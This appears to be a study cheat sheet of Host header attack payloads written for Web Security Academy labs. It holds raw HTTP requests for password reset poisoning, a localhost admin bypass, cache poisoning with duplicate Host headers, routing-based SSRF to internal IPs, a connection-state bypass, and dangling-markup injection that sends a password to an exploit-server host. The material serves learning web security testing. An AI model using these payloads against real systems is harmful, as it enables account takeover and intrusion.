##### Host Header – Basic password reset poisoning ```http POST /forgot-password HTTP/1.1 Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net Content-Type: application/x-www-form-urlencoded username=carlos ``` Context: Reset link in email built directly from `Host` header. Encoding: None – raw header injection. Source: [[1. Basic password reset poisoning]] --- ##### Host Header – Authentication bypass (`localhost`) ```http GET /admin HTTP/1.1 Host: localhost ``` Context: Privilege decision based on `Host`; β€œlocalhost” treated as internal. Encoding: None. Source: [[2. Host header authentication bypass]] --- ##### Host Header – Web cache poisoning via duplicate Host ```http GET /?cb=123 HTTP/1.1 Host: LAB-ID.web-security-academy.net Host: EXPLOIT-SERVER-ID.exploit-server.net ``` Context: Cache parses first Host, backend parses second; malicious resource cached for victims. Encoding: None – duplicate header smuggling. Source: [[3. Web cache poisoning via ambiguous requests]] --- ##### Host Header – Routing-based SSRF ```http GET /admin HTTP/1.1 Host: 192.168.0.1 ``` Context: Host header used for backend routing; internal IP reachable from frontend. Encoding: None. Source: [[4. Routing-based SSRF]] --- ##### Host Header – Flawed request parsing ```http GET https://LAB-ID.web-security-academy.net/ HTTP/1.1 Host: 192.168.0.55 ``` Context: Backend validates absolute-URL host, ignores `Host` header β†’ SSRF possible. Encoding: None. Source: [[5. SSRF via flawed request parsing]] --- ##### Host Header – Connection state attack (keep-alive) ```http GET / HTTP/1.1 Host: LAB-ID.web-security-academy.net Connection: keep-alive GET /admin HTTP/1.1 Host: 192.168.0.1 ``` Context: Host validation only on first request per TCP connection; second request inherits routing. Encoding: None – sequence over single connection. Source: [[6. Host validation bypass via connection state attack]] --- ##### Host Header – Password reset poisoning via dangling markup ```http POST /forgot-password HTTP/1.1 Host: LAB-ID.web-security-academy.net:'<a href="//EXPLOIT-SERVER-ID.exploit-server.net/? Content-Type: application/x-www-form-urlencoded username=carlos ``` Context: Raw HTML email view unsanitized; dangling markup exfiltrates plaintext password. Encoding: None – HTML injection via Host. Source: [[7. Password reset poisoning via dangling markup]]